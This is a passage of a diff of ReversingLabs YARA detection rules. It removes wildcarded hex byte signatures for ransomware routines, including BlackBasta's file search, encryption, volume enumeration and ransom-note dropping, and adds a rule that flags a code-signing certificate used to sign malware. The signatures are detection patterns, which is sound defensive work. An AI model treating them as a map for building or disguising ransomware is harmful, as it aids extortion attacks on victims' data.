-            FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 5D
-            ?? 83 3F ?? 0F 84 ?? ?? ?? ?? EB ?? 8B F3 8B 5B ?? FF 36 E8 ?? ?? ?? ?? 56 E8 ?? ??
-            ?? ?? 59 59 85 DB 75 ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$remote_connection = {
-            55 8B EC 81 EC ?? ?? ?? ?? 56 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 33 C0 66 89 85 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 56 56 56 56 50 FF 15 ?? ?? ?? ?? 8B F8 33 C0 89 7D ?? 85 FF 0F 84 ?? ??
-            ?? ?? 66 89 45 ?? 33 C9 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 56 FF 75 ?? 41 89 75 ??
-            89 75 ?? 89 75 ?? 89 75 ?? 89 4D ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89
-            4D ?? 89 75 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 57 FF 15 ?? ?? ?? ?? 33 C0 E9
-            ?? ?? ?? ?? 8B 4D ?? 33 D2 8B 45 ?? 53 56 66 89 14 41 FF 75 ?? FF 75 ?? 57 FF 15 ??
-            ?? ?? ?? 8B D8 89 5D ?? 85 DB 75 ?? 57 EB ?? 8B 45 ?? 66 39 30 75 ?? 6A ?? 59 66 89
-            08 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33
-            C0 83 7D ?? ?? B9 ?? ?? ?? ?? 66 89 45 ?? 0F 44 C1 0D ?? ?? ?? ?? 50 56 56 56 FF 75
-            ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 57 FF 15 ?? ?? ?? ?? FF 75 ??
-            FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B FE 50 6A ?? 6A ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 45 ?? 56 FF 75 ?? 8D 85
-            ?? ?? ?? ?? FF 75 ?? FF 75 ?? 6A ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ??
-            ?? 3D ?? ?? ?? ?? 75 ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 53 FF 15 ?? ??
-            ?? ?? 85 C0 6A ?? 58 0F 45 F8 85 FF 75 ?? 8B 45 ?? 56 53 89 30 FF 15 ?? ?? ?? ?? 8B
-            7D ?? 85 C0 74 ?? 56 8D 45 ?? 89 75 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 68 ??
-            ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 4D ?? F7 D8 1B C0 23 45 ?? 89 01 3D ?? ?? ?? ?? 75
-            ?? FF 75 ?? 53 E8 ?? ?? ?? ?? 59 59 8B F0 57 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ??
-            ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C6 5B 5F 5E 8B E5 5D C3
-        }
-		$encrypt_files = {
-            55 8B EC 51 83 7D ?? ?? 53 56 57 BB ?? ?? ?? ?? 7F ?? 7C ?? 39 5D ?? 73 ?? 8B 5D ??
-            8B 7D ?? 8D 83 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 59 59 EB ?? E8 ?? ?? ?? ?? 83 F8 ??
-            75 ?? 6A ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 85
-            F6 74 ?? 89 9E ?? ?? ?? ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? EB ?? 33 C0 EB ?? E8 ?? ??
-            ?? ?? 8B 55 ?? 8B CA 4A 89 55 ?? 85 C9 74 ?? 83 F8 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 83
-            F8 ?? 74 ?? A8 ?? 74 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 56 E8 ??
-            ?? ?? ?? 8B C6 59 5F 5E 5B 8B E5 5D C3 56 57 E8 ?? ?? ?? ?? 59 33 C0 EB
-        }
-		$enum_resources = {
-            55 8B EC 83 EC ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74
-            ?? 33 C0 E9 ?? ?? ?? ?? 83 4D ?? ?? B8 ?? ?? ?? ?? 57 50 89 45 ?? E8 ?? ?? ?? ?? 8B
-            F8 59 85 FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 EB ?? 53 56 8D 45 ?? 50 57 8D 45
-            ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 75 ?? 33 DB 39 5D ?? 76 ?? 8D 77 ??
-            83 7E ?? ?? 75 ?? FF 75 ?? FF 36 E8 ?? ?? ?? ?? 59 59 F6 46 ?? ?? 74 ?? 8D 46 ?? 50
-            FF 75 ?? E8 ?? ?? ?? ?? 59 59 43 83 C6 ?? 3B 5D ?? 72 ?? 8B 45 ?? 3D ?? ?? ?? ?? 75
-            ?? 57 E8 ?? ?? ?? ?? 59 FF 75 ?? FF 15 ?? ?? ?? ?? F7 D8 5E 1B C0 40 5B 5F 8B E5 5D
-            C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $search_files ) and ( $encrypt_files ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "5f:ba:9b:37:3f:81:2c:16:ae:f5:31:d4" and 1473329076 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Blackbasta : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_616A5205238590B01D7B761E444E4Ad9 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BlackBasta ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7a4ad567-0612-5a9c-8a06-4d615bc7e24a"
-		date = "2022-12-13"
-		modified = "2022-12-13"
+		id = "09e9e481-c767-53d3-9af1-11dec636cafb"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.BlackBasta.yara#L1-L293"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15882-L15898"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "79c81a4470e9eabbd714b1a91621c7b2bbe42d5371ba2c799529662d5f5c479a"
+		logic_hash = "463ccd3ace9021569a7a6d5fcbaadf34b15d2b07baf3df526b271b547cf2bbc5"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BlackBasta"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            48 8B 44 24 ?? 83 A0 ?? ?? ?? ?? ?? 44 8B C9 EB ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 44 38
-            75 ?? 74 ?? 48 8B 44 24 ?? 83 A0 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? EB ?? 44 38 75 ??
-            74 ?? 48 8B 44 24 ?? 83 A0 ?? ?? ?? ?? ?? 45 8B CE 4C 8D 44 24 ?? 48 8B CF 48 8D 54
-            24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 4C 8D 45 ?? 85 C0 44 89 74 24 ?? 4C 89 74 24 ??
-            49 0F 45 CE 45 33 C9 33 D2 FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 4D 8B CC 45
-            33 C0 33 D2 48 8B CF E8 ?? ?? ?? ?? 8B D8 44 38 74 24 ?? 74 ?? 48 8B 4C 24 ?? E8 ??
-            ?? ?? ?? 8B C3 E9 ?? ?? ?? ?? 49 8B 74 24 ?? 49 2B 34 24 48 C1 FE ?? 33 D2 4C 89 75
-            ?? 48 8D 4D ?? 4C 89 75 ?? 4C 89 75 ?? 4C 89 75 ?? 4C 89 75 ?? 44 88 75 ?? E8 ?? ??
-            ?? ?? 48 8B 45 ?? B9 ?? ?? ?? ?? 39 48 ?? 75 ?? 44 38 75 ?? 74 ?? 48 8B 45 ?? 83 A0
-            ?? ?? ?? ?? ?? 44 8B C9 EB ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 44 38 75 ?? 74 ?? 48 8B 45
-            ?? 83 A0 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? EB ?? 44 38 75 ?? 74 ?? 48 8B 45 ?? 83 A0
-            ?? ?? ?? ?? ?? 45 8B CE 4C 8D 44 24 ?? 48 8D 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B
-            75 ?? 33 D2 85 C0 49 8B CE 48 0F 45 CA 80 39 ?? 75 ?? 8A 41 ?? 84 C0 75 ?? 38 55 ??
-            74 ?? 49 8B CE E8 ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 38 51 ?? 74 ?? 4D 8B CC 4D 8B C5 48
-            8B D7 E8 ?? ?? ?? ?? 44 8B E8 85 C0 75 ?? 38 45 ?? 74 ?? 49 8B CE E8 ?? ?? ?? ?? 4C
-            8B 6C 24 ?? 48 8D 55 ?? 48 8B CB FF 15 ?? ?? ?? ?? 45 33 F6 85 C0 0F 85 ?? ?? ?? ??
-            49 8B 04 24 49 8B 54 24 ?? 48 2B D0 48 C1 FA ?? 48 3B F2 74 ?? 48 2B D6 48 8D 0C F0
-            4C 8D 0D ?? ?? ?? ?? 45 8D 46 ?? E8 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 44 38 74
-            24 ?? 74 ?? 48 8B 4C 24
-        }
-		$find_system_volumes_v1_p1 = {
-            48 89 4C 24 ?? 55 53 56 57 41 56 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ??
-            48 8B F1 45 33 FF 44 89 7C 24 ?? 4C 89 39 4C 89 79 ?? 4C 89 79 ?? C7 44 24 ?? ?? ??
-            ?? ?? BA ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 4C 8B F0 0F 1F 00 4C 8D 8D ??
-            ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 44 89 7C 24 ?? 4C 89 7C 24 ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24
-            ?? 4C 89 7C 24 ?? 45 33 C9 45 33 C0 33 D2 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? F7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 8D 14 00 48 8D BD ?? ?? ?? ?? 48 03 FA 4C 89 7C 24 ?? 4C 89
-            7C 24 ?? 4C 89 7C 24 ?? 4C 89 7C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 48
-            8D 9D ?? ?? ?? ?? 48 D1 FA 48 83 FA ?? 72 ?? 45 33 C0 48 8D 4C 24 ?? E8
-        }
-		$find_system_volumes_v1_p2 = {
-            4C 89 7C 24 ?? 48 8D 44 24 ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 3B C7 74
-            ?? 66 66 66 0F 1F 84 00 ?? ?? 00 00 44 0F B6 0B 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 3B
-            CA 73 ?? 48 8D 41 ?? 48 89 44 24 ?? 48 8D 44 24 ?? 48 83 FA ?? 48 0F 43 44 24 ?? 44
-            88 0C 08 C6 44 08 ?? ?? EB ?? 45 33 C0 41 8D 50 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48
-            83 C3 ?? 48 3B DF 75 ?? 4C 89 BD ?? ?? ?? ?? 48 8B 46 ?? 48 3B 46 ?? 74 ?? 4C 89 38
-            4C 89 78 ?? 4C 89 78 ?? 41 B8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B C8 E8 ?? ?? ?? ?? 4C
-            89 7C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 48 83 46 ?? ?? EB ?? 4C 8D 44
-            24 ?? 48 8B D0 48 8B CE E8 ?? ?? ?? ?? 90 48 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 FF C2
-            48 8B 4C 24 ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1
-            48 83 C0 ?? 48 83 F8 ?? 77 ?? E8 ?? ?? ?? ?? 4C 89 7C 24 ?? 48 C7 44 24 ?? ?? ?? ??
-            ?? C6 44 24 ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 54 24 ?? 49 8B CE FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 48 8B C6 48 81 C4
-        }
-		$set_default_icon_p1 = {
-            48 89 5C 24 ?? 48 89 4C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 81 EC ?? ?? ?? ??
-            48 8B F1 45 33 ED 44 89 6C 24 ?? 4C 8B 35 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 4C 8B F8 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B C8 49 2B CE 49 3B CF 0F 82 ?? ??
-            ?? ?? 4C 8D 25 ?? ?? ?? ?? 48 83 3D ?? ?? ?? ?? ?? 4C 0F 43 25 ?? ?? ?? ?? 4C 89 6C
-            24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 4B 8D 2C 37 BB ?? ?? ?? ?? 48 8D 7C 24 ?? 48 3B
-            EB 0F 86 ?? ?? ?? ?? 48 8B DD 48 83 CB ?? 48 3B D8 76 ?? 48 8B D8 48 B8 ?? ?? ?? ??
-            ?? ?? ?? ?? 48 8D 0C 00 EB ?? B8 ?? ?? ?? ?? 48 3B D8 48 0F 42 D8 48 8D 4B ?? 48 B8
-            ?? ?? ?? ?? ?? ?? ?? ?? 48 3B C8 0F 87 ?? ?? ?? ?? 48 03 C9 48 81 F9 ?? ?? ?? ?? 72
-            ?? 48 8D 41 ?? 48 3B C1 0F 86 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ??
-            ?? ?? ?? 48 8D 78 ?? 48 83 E7 ?? 48 89 47 ?? EB ?? 48 85 C9 74 ?? E8 ?? ?? ?? ?? 48
-            8B F8 EB ?? 49 8B FD 48 89 7C 24 ?? 48 89 6C 24 ?? 48 89 5C 24 ?? 4B 8D 1C 36 4C 8B
-        }
-		$set_default_icon_p2 = {
-            C3 49 8B D4 48 8B CF E8 ?? ?? ?? ?? 48 8D 0C 3B 4F 8D 04 3F 48 8D 15 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 66 44 89 2C 6F BB ?? ?? ?? ?? 89 5C 24 ?? 48 8D 54 24 ?? 48 83 7C 24 ??
-            ?? 48 0F 43 54 24 ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 84 24 ?? ?? ?? ??
-            48 89 44 24 ?? 4C 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 44 89 6C 24 ?? 45 33 C9 45 33
-            C0 48 C7 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8B CE 48 83 7E ?? ?? 72 ??
-            48 8B 0E 8B 46 ?? 03 C0 89 44 24 ?? 48 89 4C 24 ?? 44 8B CB 45 33 C0 48 8D 15 ?? ??
-            ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 33 D2 B9 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? EB ?? 4C 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 4C 24
-            ?? 45 33 C9 44 8B C0 33 D2 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 E3 ?? 89 5C 24 ?? 48
-            8B 54 24 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B C1 48 81
-            FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 77 ??
-            E8 ?? ?? ?? ?? 4C 89 6C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 44 89 6C 24 ?? 48 8B CE
-            E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C
-            5F 5E 5D C3
-        }
-		$cmd_prompt = {
-            48 89 5C 24 ?? 48 89 7C 24 ?? 55 48 8B EC 48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4
-            48 89 45 ?? 48 8B D9 4C 8D 05 ?? ?? ?? ?? 33 FF 48 8D 4D ?? 33 D2 48 89 7D ?? E8 ??
-            ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 85 DB 75 ?? 48 8B 4D ?? 48 85 C9 0F 84 ?? ??
-            ?? ?? 33 D2 E8 ?? ?? ?? ?? 48 8B 4D ?? 8B D8 E8 ?? ?? ?? ?? 85 DB 40 0F 94 C7 E9 ??
-            ?? ?? ?? 48 8B 45 ?? 48 8D 0D ?? ?? ?? ?? 48 89 45 ?? 48 89 4D ?? 48 89 5D ?? 48 89
-            7D ?? 48 85 C0 74 ?? E8 ?? ?? ?? ?? 8B 18 E8 ?? ?? ?? ?? 45 33 C9 4C 8D 45 ?? 33 C9
-            89 38 48 8B 55 ?? E8 ?? ?? ?? ?? 48 8B F8 83 F8 ?? 74 ?? E8 ?? ?? ?? ?? 89 18 EB ??
-            E8 ?? ?? ?? ?? 83 38 ?? 74 ?? E8 ?? ?? ?? ?? 83 38 ?? 74 ?? 48 8B 4D ?? E8 ?? ?? ??
-            ?? 83 CF ?? EB ?? E8 ?? ?? ?? ?? 89 18 48 8D 15 ?? ?? ?? ?? 45 33 C9 4C 8D 45 ?? 48
-            89 55 ?? 33 C9 E8 ?? ?? ?? ?? 48 8B F8 48 8B 4D ?? E8 ?? ?? ?? ?? 8B C7 48 8B 4D ??
-            48 33 CC E8 ?? ?? ?? ?? 4C 8D 5C 24 ?? 49 8B 5B ?? 49 8B 7B ?? 49 8B E3 5D C3
-        }
-		$exclude_from_encryption = {
-            66 89 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D
-            4D ?? E8 ?? ?? ?? ?? 90 45 33 C0 48 8D 55 ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B F8 48 8B
-            55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA ?? ??
-            ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 89 75 ?? 48 83 FF ?? 0F 85
-            ?? ?? ?? ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ??
-            66 89 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D
-            4D ?? E8 ?? ?? ?? ?? 90 45 33 C0 48 8D 55 ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B F8 48 8B
-            55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA ?? ??
-            ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 89 75 ?? 48 83 FF ?? 0F 85
-            ?? ?? ?? ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ??
-            66 89 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D
-            4D ?? E8 ?? ?? ?? ?? 90 45 33 C0 48 8D 55 ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B F8 48 8B
-            55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA ?? ??
-            ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0
-        }
-		$encrypt_files_v1 = {
-            41 83 CC ?? 44 89 64 24 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 83 FF ?? 48 0F 43 8C 24 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 8B F8 41 83 E4 ?? 44 89 64 24 ?? 48 8B 94 24 ?? ?? ?? ?? 48
-            83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ??
-            ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 89 94 24 ?? ?? ?? ?? 48 8B 49
-            ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ??
-            ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 9C 24 ?? ?? 00 00 40 F6 C7 ?? 74
-            ?? 49 8B CF E8 ?? ?? ?? ?? 90 48 BE ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? 4C
-            8D 35 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? E9 ?? ?? ?? ?? 49 8B CF E8 ?? ?? ?? ?? C6 84
-            24 ?? ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B F0 48
-            89 9C 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 4C 8B 70 ?? 48
-            83 78 ?? ?? 72 ?? 48 8B 30 48 8D 8C 24 ?? ?? ?? ?? 49 83 FE ?? 73 ?? 41 B8 ?? ?? ??
-            ?? 48 8B D6 E8 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ??
-            ?? EB ?? 4C 89 AC 24 ?? ?? ?? ?? 49 8B FE 48 83 CF ?? 48 89 BC 24 ?? ?? ?? ?? 49 3B
-            FD 49 0F 47 FD 48 8D 57 ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 4E 8D 04 75 ?? ??
-            ?? ?? 48 8B D6 48 8B C8 E8 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48 89 BC 24
-        }
-		$find_system_volumes_v2 = {
-            BA ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 0F 1F 44 00 ?? 4C 8D 8D ??
-            ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 89 74 24 ?? 48 89 74 24 ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24 ??
-            48 89 74 24 ?? 45 33 C9 45 33 C0 33 D2 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
-            0F 84 ?? ?? ?? ?? F7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 4C 8D 04 00 48 8D 85 ?? ?? ?? ?? 49 03 C0 48 89 74 24 ?? 48 89 74
-            24 ?? 48 89 74 24 ?? 48 89 74 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 89 74 24 ?? 48 8D
-            8D ?? ?? ?? ?? 48 3B C8 74 ?? 49 D1 F8 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ??
-            ?? ?? 90 48 8B 43 ?? 48 3B 43 ?? 74 ?? 48 89 30 48 89 70 ?? 48 89 70 ?? 41 B8 ?? ??
-            ?? ?? 48 8D 54 24 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 89 74 24 ?? 48 C7 44 24 ?? ?? ?? ??
-            ?? 66 89 74 24 ?? 48 83 43 ?? ?? EB ?? 4C 8D 44 24 ?? 48 8B D0 48 8B CB E8 ?? ?? ??
-            ?? 90 48 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B
-            C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8
-            ?? 77 ?? E8 ?? ?? ?? ?? 48 89 74 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 89 74 24 ?? 41
-            B8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48
-            8B CF FF 15 ?? ?? ?? ?? 48 8B C3 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5F 5E
-            5D C3
-        }
-		$drop_ransom_note = {
-            48 83 3D ?? ?? ?? ?? ?? 48 0F 43 15 ?? ?? ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 8D 4D ?? E8
-            ?? ?? ?? ?? 48 8B D8 4C 89 75 ?? 4C 89 75 ?? 4C 89 75 ?? 45 8D 46 ?? 48 8B D0 48 8D
-            4D ?? E8 ?? ?? ?? ?? 4C 89 73 ?? 48 C7 43 ?? ?? ?? ?? ?? 66 44 89 33 BE ?? ?? ?? ??
-            89 75 ?? 83 E6 ?? 89 75 ?? 48 8B 55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48
-            8B 4D ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83
-            C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 75 ?? 48 C7 45 ?? ?? ?? ??
-            ?? 66 44 89 75 ?? 48 8D 4D ?? 48 83 7D ?? ?? 48 0F 43 4D ?? 4C 89 74 24 ?? C7 44 24
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 48 8B D8 48 83 F8 ?? 74 ?? 4C 89 74 24 ?? 45 33 C9 41 B8 ?? ?? ?? ?? 48 8D 15
-            ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 83 E6 ?? 89 75 ??
-            48 8B 55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA
-            ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 44 89 75 ?? 48 8B 57
